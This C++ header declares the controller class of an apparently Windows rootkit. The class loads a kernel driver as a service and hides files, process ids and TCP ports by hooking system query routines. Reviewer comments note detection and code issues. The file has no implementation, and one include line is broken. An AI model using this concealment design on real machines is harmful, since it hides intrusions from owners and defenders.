

#pragma once 
#include  
#include "../I_RootKitModule.h" 
 
 
 
// CRootKitModule: user-mode controller class declared on top of CPinboard.
// This header only declares the interface; no behavior is visible here.
// The public methods fall into four groups: driver lifecycle (create, start,
// stop, delete) and three hide lists (files, process ids, local TCP ports),
// each with Add/Del/Start members.
//
// NOTE(review): per the original comments, the three Start* members enable
// hooks on ZwQueryDirectoryFile, ZwQuerySystemInformation and
// ZwDeviceIoControlFile. If so, directory, process and port listings taken
// on a host where this driver is loaded cannot be trusted; an integrity
// check of those routines or an offline view is needed -- confirm against
// the implementation and the driver source.
// NOTE(review): the protected helpers take an SC_HANDLE, so the driver is
// presumably registered and started through the service control manager,
// which would leave service-creation records behind -- confirm in the .cpp.
// NOTE(review): declaration order of the virtual members determines vtable
// layout; do not reorder them without checking I_RootKitModule.h.
class CRootKitModule : 
	public CPinboard 
{ 
	// Project macro; its expansion is not visible in this file.
	COMPONENT_INSTANCE_PINBOARD(CRootKitModule) 
public: 
	// Purpose cannot be determined from this header.
	virtual void Test() ; 
public: 
	// Interface implementation (presumably the interface declared in
	// ../I_RootKitModule.h -- confirm).
	//
	// Driver lifecycle. All four return bool; the meaning of true/false is
	// not documented here (presumably success/failure -- confirm).
	// NOTE(review): CreateDriver takes LPCSTR (ANSI) while DeleteDriver and
	// the service helpers take LPCTSTR, and the stored name is std::wstring.
	// In a UNICODE build a conversion has to happen in the implementation;
	// in an ANSI build LPCTSTR and std::wstring do not match -- confirm the
	// character set the project is built with.
	virtual bool CreateDriver(LPCSTR szFileName, LPCSTR szDriver);  
	virtual bool StartDriver() ;  
	virtual bool StopDriver();   
	// szDriver defaults to NULL; which driver is removed in that case is
	// not visible here (presumably the one in m_strDriverName -- confirm).
	virtual bool DeleteDriver(LPCTSTR szDriver = NULL); 
 
	virtual bool AddHideFile(LPCTSTR szFile);  // add a file to hide; at most 10 (limit stated by the original comment, not enforced in this header)
	virtual bool DelHideFile(LPCTSTR szFile);  // stop hiding a file
	virtual bool StartHideFile();              // start the hook on ZwQueryDirectoryFile
 
	virtual bool AddHideProcessId(DWORD dwId);        // add a process id to hide; at most 10 (per the original comment)
	virtual bool DelHideProcessId(DWORD dwId);        // stop hiding a process id
	virtual bool StartHideProcess();                     // start the hook on ZwQuerySystemInformation
 
	virtual bool AddHidePort(DWORD dwPort);             // hide a local TCP port; at most 10 (per the original comment)
	virtual bool DelHidePort(DWORD dwPort); // remove a port from the hide list
	virtual bool StartHidePort();                  // hook ZwDeviceIoControlFile
protected: 
	// Service helpers operating on a caller-supplied SC_HANDLE. They return
	// Win32 BOOL, unlike the public members, which return bool.
	// NOTE(review): StartService is also the name of a Win32 API that the
	// SDK headers define as an A/W macro, so this member is presumably
	// renamed by the preprocessor when those headers are included first --
	// confirm it is declared and defined under the same macro state.
	BOOL StopService(SC_HANDLE hSCManager, LPCTSTR ServiceName); 
	BOOL StartService(SC_HANDLE hSCManager, LPCTSTR ServiceName); 
	BOOL InstallService(SC_HANDLE hSCManager, LPCTSTR ServiceName, LPCTSTR ServiceExe); 
	BOOL RemoveService(SC_HANDLE hSCManager, LPCTSTR ServiceName); 
 
	// Returns a HANDLE and takes no arguments; presumably opens the
	// driver's device object for control requests -- confirm in the .cpp.
	HANDLE _CreateFile(); 
protected: 
	// NOTE(review): no constructor or destructor is declared in this header,
	// so where this handle is initialized and closed is not visible here
	// (possibly inside the macro above) -- confirm it is not leaked.
	SC_HANDLE m_hSCManager; 
	// Needs <string>. NOTE(review): the bare `#include` at the top of this
	// listing lost its header name -- confirm which header it was.
	std::wstring m_strDriverName; 
};